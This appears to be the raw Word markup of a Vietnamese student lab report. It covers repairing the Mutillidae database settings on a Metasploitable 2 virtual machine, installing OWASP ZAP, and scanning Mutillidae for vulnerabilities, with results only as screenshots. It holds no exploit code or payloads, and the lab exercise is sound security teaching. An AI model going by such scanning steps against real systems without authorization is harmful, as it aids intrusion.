          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF37070" wp14:editId="5B6F720F">
            <wp:extent cx="5943600" cy="3896360"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="18132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9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AC66" w14:textId="77777777" w:rsidR="00F812BB" w:rsidRPr="00F812BB" w:rsidRDefault="00F812BB" w:rsidP="00F812BB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F812BB">
        <w:t>sudo nano config.inc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D397C73" w14:textId="3F195B75" w:rsidR="00F812BB" w:rsidRDefault="00F812BB" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F812BB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD66BB9" wp14:editId="4CF9E97D">
            <wp:extent cx="5943600" cy="3856990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="136380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08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CEA" w14:textId="09023C6F" w:rsidR="00F812BB" w:rsidRDefault="00F812BB" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F812BB">
        <w:t>$dbname = 'owasp10';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9F864" w14:textId="4FD208DC" w:rsidR="00F812BB" w:rsidRDefault="00F812BB" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F812BB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47AAC3BA" wp14:editId="58C00F05">
            <wp:extent cx="5941608" cy="3912041"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="97248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84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6008" cy="39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F3EB" w14:textId="77777777" w:rsidR="00F812BB" w:rsidRDefault="00F812BB" w:rsidP="00F812BB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F812BB">
        <w:lastRenderedPageBreak/>
        <w:t>sudo reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC2FEF" w14:textId="4FC0A273" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="00F812BB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B827A7" w14:textId="78D696A8" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="00F812BB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B5E9641" wp14:editId="6F50351D">
            <wp:extent cx="5943600" cy="3917315"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="179125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58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5B2A" w14:textId="7F411E30" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="00F812BB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3674">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00300A3B" wp14:editId="2604EA97">
            <wp:extent cx="5943600" cy="7435215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="171266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661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EBC7" w14:textId="10BC1948" w:rsidR="008C28A8" w:rsidRDefault="008C28A8" w:rsidP="00F812BB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008C28A8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B22A4D8" wp14:editId="653A2F65">
            <wp:extent cx="5943600" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="137384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493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2ACB" w14:textId="0BC8457D" w:rsidR="008C28A8" w:rsidRDefault="008C28A8" w:rsidP="00F812BB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D1E8A3A" wp14:editId="66906069">
            <wp:extent cx="5943600" cy="683260"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="79744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448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5D0" w14:textId="636AB980" w:rsidR="008C28A8" w:rsidRDefault="008C28A8" w:rsidP="00F812BB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="105B589E" wp14:editId="1B635535">
            <wp:extent cx="3771900" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="147222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207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7AA6" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E58611D" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3282081F" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289F699F" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51556359" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19995781" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206606CA" w14:textId="53D12586" w:rsidR="00F812BB" w:rsidRDefault="008C28A8" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2. Khởi động máy ảo Metasploitable 2. Sau đó dùng công cụ OWASP ZAP để tìm các lỗ hổng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bảo mật có trên ứng dụng web Mutillidae trên máy ảo Metasploitable 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDC65E" w14:textId="77777777" w:rsidR="008C28A8" w:rsidRPr="008C28A8" w:rsidRDefault="008C28A8" w:rsidP="008C28A8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008C28A8">
        <w:t>owasp-zap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B0AD2" w14:textId="078D039F" w:rsidR="008C28A8" w:rsidRDefault="008C28A8" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47D09732" wp14:editId="519F5966">
            <wp:extent cx="5943600" cy="4585970"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="197149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990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8A70" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="00EA3674">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>owasp-zap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE3D70A" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="00EA3674">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Command 'owasp-zap' not found, but can be installed with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD40C6" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="00EA3674">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install zaproxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466AB0DD" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRPr="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="00EA3674">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do you want to install it? </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3674">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>(N/y)y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DFC8E0" w14:textId="060FEC53" w:rsidR="00EA3674" w:rsidRPr="006667F6" w:rsidRDefault="00EA3674" w:rsidP="00EA3674">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3674">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sudo apt install zaproxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E24B2" w14:textId="792AE80B" w:rsidR="004339AB" w:rsidRDefault="00EA3674" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3674">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E14F04C" wp14:editId="30B1D629">
            <wp:extent cx="5943600" cy="4576445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117508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839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7E0" w14:textId="79BD8A3B" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3674">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776D015A" wp14:editId="360FAF36">
            <wp:extent cx="5943600" cy="4576445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161806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50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B13" w14:textId="340605FA" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3674">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66200DE0" wp14:editId="108584ED">
            <wp:extent cx="5943600" cy="4589145"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="86123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94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EB25" w14:textId="5D441CD7" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3674">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19134358" wp14:editId="1EE8D74F">
            <wp:extent cx="5943600" cy="4427855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="157930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45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92B9" w14:textId="44FB3C24" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3674">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="753F055F" wp14:editId="5DE84D8F">
            <wp:extent cx="5943600" cy="6776720"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="16434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153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0544" w14:textId="16BD796A" w:rsidR="00EA3674" w:rsidRDefault="00E376CE" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E376CE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DE78A88" wp14:editId="37AB1EF0">
            <wp:extent cx="5943600" cy="6804660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15801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1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5822" w14:textId="66B13E12" w:rsidR="00E376CE" w:rsidRDefault="00E376CE" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E376CE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38A725C9" wp14:editId="5FEAE5B9">
            <wp:extent cx="5943600" cy="6718935"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="22757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87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653B" w14:textId="29F37A07" w:rsidR="00E376CE" w:rsidRDefault="00E376CE" w:rsidP="00E376CE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E376CE">
        <w:t>---HẾT---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70927AFF" w14:textId="77777777" w:rsidR="00EA3674" w:rsidRDefault="00EA3674" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EA36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65774C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4E4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82824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7F"/>
    <w:rsid w:val="000F6D2B"/>
    <w:rsid w:val="003762C7"/>
    <w:rsid w:val="00395774"/>
    <w:rsid w:val="004019B6"/>
    <w:rsid w:val="004339AB"/>
    <w:rsid w:val="005D68D6"/>
    <w:rsid w:val="006667F6"/>
    <w:rsid w:val="0077786A"/>
    <w:rsid w:val="008C28A8"/>
    <w:rsid w:val="008D381F"/>
    <w:rsid w:val="009311DA"/>
    <w:rsid w:val="009C2113"/>
    <w:rsid w:val="00A0358A"/>
    <w:rsid w:val="00A67CD3"/>
    <w:rsid w:val="00A97E94"/>
    <w:rsid w:val="00AF79A0"/>
    <w:rsid w:val="00B12374"/>
    <w:rsid w:val="00BB4275"/>
    <w:rsid w:val="00C66206"/>
    <w:rsid w:val="00C80CF6"/>
    <w:rsid w:val="00E376CE"/>
    <w:rsid w:val="00E54ADD"/>
    <w:rsid w:val="00EA3674"/>
    <w:rsid w:val="00EA3C7F"/>
    <w:rsid w:val="00EC64C4"/>
    <w:rsid w:val="00EE6E0F"/>
    <w:rsid w:val="00EF0DE7"/>
    <w:rsid w:val="00F81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2F5BB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3C58C2C6-4ABD-49F8-A0AE-67A0AE5B6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C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C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C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C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C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C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C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C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C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C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C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C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C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C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C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C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3C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3C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39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2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595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1334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93554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241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192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72235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2443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406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youtu.be/P1I9UGpGdrU?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q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youtu.be/K7XBQWAZdZ4?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q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youtu.be/X87Ubv-qDm4?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q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hyperlink" Target="https://youtu.be/fY4-u_gccqo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nudesystems.com/fix-mutillidae-database-error-in-metasploitable-2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Tran</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kha Tran</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-28T05:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-28T08:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>